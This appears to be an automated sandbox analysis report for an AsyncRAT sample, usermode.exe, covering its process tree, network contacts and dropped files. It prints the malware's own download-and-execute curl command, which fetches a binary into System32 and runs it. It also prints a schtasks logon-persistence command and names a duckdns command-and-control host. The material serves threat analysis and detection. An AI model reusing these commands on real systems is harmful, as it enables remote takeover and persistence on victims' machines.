Malware Analysis Report

2024-09-22 06:52

Sample ID: 240620-etclzasfln
Target: usermode.exe
SHA256: 7cbd57fe2ffbaa6da63c865cce81eaf33c083e0b23d69cde51ada9f91f309a99
Tags: asyncrat, default, rat
Score: 10/10


Analysis Overview

Score: 10/10

SHA256: 7cbd57fe2ffbaa6da63c865cce81eaf33c083e0b23d69cde51ada9f91f309a99

Threat Level: Known bad

The file usermode.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat default rat

AsyncRat

Async RAT payload

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported: 2024-06-20 04:13

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-20 04:13
Reported: 2024-06-20 04:14
Platform: win7-20240419-en
Max time kernel: 63s
Max time network: 65s

Command Line

"C:\Users\Admin\AppData\Local\Temp\usermode.exe"

Signatures

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2372 wrote to memory of 2600 | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2600 | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2600 | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | C:\Windows\system32\cmd.exe
PID 2920 wrote to memory of 2136 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 2920 wrote to memory of 2136 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 2920 wrote to memory of 2136 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 2920 wrote to memory of 1224 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 2920 wrote to memory of 1224 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 2920 wrote to memory of 1224 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 2920 wrote to memory of 2112 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 2920 wrote to memory of 2112 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 2920 wrote to memory of 2112 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe

Processes

C:\Users\Admin\AppData\Local\Temp\usermode.exe

"C:\Users\Admin\AppData\Local\Temp\usermode.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | keyauth.win | udp
US | 104.26.0.5:443 | keyauth.win | tcp
US | 8.8.8.8:53 | apps.identrust.com | udp
NL | 23.63.101.171:80 | apps.identrust.com | tcp
US | 8.8.8.8:53 | x2.c.lencr.org | udp
BE | 23.55.97.11:80 | x2.c.lencr.org | tcp
N/A | 127.0.0.1:49188 | | tcp
N/A | 127.0.0.1:49190 | | tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-06-20 04:13
Reported: 2024-06-20 04:16
Platform: win10v2004-20240611-en
Max time kernel: 140s
Max time network: 148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\usermode.exe"

Signatures

AsyncRat (tags: rat, asyncrat)

Async RAT payload (tags: rat)

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\boot_cnfg_x32.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\boot_cnfg_x32.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Update.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\System32\boot_cnfg_x32.exe | C:\Windows\system32\curl.exe | N/A

Enumerates physical storage devices

Delays execution with timeout.exe (tags: evasion)

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\timeout.exe | N/A

Scheduled Task/Job: Scheduled Task (tags: persistence, execution)

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\boot_cnfg_x32.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Update.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 856 wrote to memory of 4016 | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | C:\Windows\system32\cmd.exe
PID 856 wrote to memory of 4016 | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | C:\Windows\system32\cmd.exe
PID 4016 wrote to memory of 4412 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 4016 wrote to memory of 4412 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe
PID 4016 wrote to memory of 4500 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\boot_cnfg_x32.exe
PID 4016 wrote to memory of 4500 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\boot_cnfg_x32.exe
PID 4500 wrote to memory of 2716 | N/A | C:\Windows\System32\boot_cnfg_x32.exe | C:\Windows\System32\cmd.exe
PID 4500 wrote to memory of 2716 | N/A | C:\Windows\System32\boot_cnfg_x32.exe | C:\Windows\System32\cmd.exe
PID 4500 wrote to memory of 4560 | N/A | C:\Windows\System32\boot_cnfg_x32.exe | C:\Windows\system32\cmd.exe
PID 4500 wrote to memory of 4560 | N/A | C:\Windows\System32\boot_cnfg_x32.exe | C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 4472 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 2716 wrote to memory of 4472 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 856 wrote to memory of 884 | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | C:\Windows\system32\cmd.exe
PID 856 wrote to memory of 884 | N/A | C:\Users\Admin\AppData\Local\Temp\usermode.exe | C:\Windows\system32\cmd.exe
PID 4560 wrote to memory of 944 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe
PID 4560 wrote to memory of 944 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\timeout.exe
PID 884 wrote to memory of 5008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 884 wrote to memory of 5008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 884 wrote to memory of 1224 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 884 wrote to memory of 1224 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 884 wrote to memory of 3536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 884 wrote to memory of 3536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 4560 wrote to memory of 4576 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Roaming\Update.exe
PID 4560 wrote to memory of 4576 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Roaming\Update.exe

Uses Task Scheduler COM API (tags: persistence)

Processes

C:\Users\Admin\AppData\Local\Temp\usermode.exe

"C:\Users\Admin\AppData\Local\Temp\usermode.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe

C:\Windows\system32\curl.exe

curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe

C:\Windows\System32\boot_cnfg_x32.exe

C:\\Windows\\System32\\boot_cnfg_x32.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Users\Admin\AppData\Roaming\Update.exe

"C:\Users\Admin\AppData\Roaming\Update.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4352,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:8

Network

Country | Destination | Domain | Proto
GB | 87.248.205.0:80 | | tcp
US | 8.8.8.8:53 | raw.githubusercontent.com | udp
US | 185.199.111.133:443 | raw.githubusercontent.com | tcp
US | 8.8.8.8:53 | g.bing.com | udp
US | 13.107.21.237:443 | g.bing.com | tcp
NL | 23.62.61.97:443 | www.bing.com | tcp
US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp
US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp
N/A | 127.0.0.1:49840 | | tcp
N/A | 127.0.0.1:49842 | | tcp
US | 8.8.8.8:53 | keyauth.win | udp
US | 172.67.72.57:443 | keyauth.win | tcp
US | 8.8.8.8:53 | x2.c.lencr.org | udp
BE | 23.55.97.11:80 | x2.c.lencr.org | tcp
US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 57.72.67.172.in-addr.arpa | udp
US | 20.189.173.15:443 | | tcp
US | 8.8.8.8:53 | hmnms.duckdns.org | udp
CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp
US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp
CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp
US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp
N/A | 127.0.0.1:49869 | | tcp
N/A | 127.0.0.1:49871 | | tcp
US | 172.67.72.57:443 | keyauth.win | tcp
CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp
US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp
US | 8.8.8.8:53 | hmnms.duckdns.org | udp
CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp
CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp
CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp

Files

C:\Windows\System32\boot_cnfg_x32.exe

MD5 8f601efcbf3eb183bbd6500296b9ccd2
SHA1 2542d3fe0e97fa969c0ef8e86676ba1c72e6e846
SHA256 5e4a8ebbeb1b7288087c65c0f5edf6d6016528f2bf5104cfc7fd5b315bf1affd
SHA512 d101aa1cc4281e29813aaa269b26d9e500a0ee042024273a636fc06d59d4af30d04d1670a58e54d3263cb6dfe9b67c71ef58c4175628841f2c8719260f548d08

memory/4500-4-0x00007FFA041D3000-0x00007FFA041D5000-memory.dmp

memory/4500-5-0x00000000009F0000-0x0000000000A02000-memory.dmp

memory/4500-6-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp

memory/4500-11-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat

MD5 2c8bc37b47cf08664a78ebbffd76d23b
SHA1 49e2f3d19a7b9edd662b9763ae47629496ca4758
SHA256 8a0da6a175df4c5ab306e7a27093f37aa60ef6f86f5e50d2b5c49fe991fad73a
SHA512 b81d18a37f816146daf286018ae6eea6ef888abb817d3db62d0552b7214494c5d2fd9a352176c84811a04581e3660da5c17a48aed696cd8feaaf0ee32f179648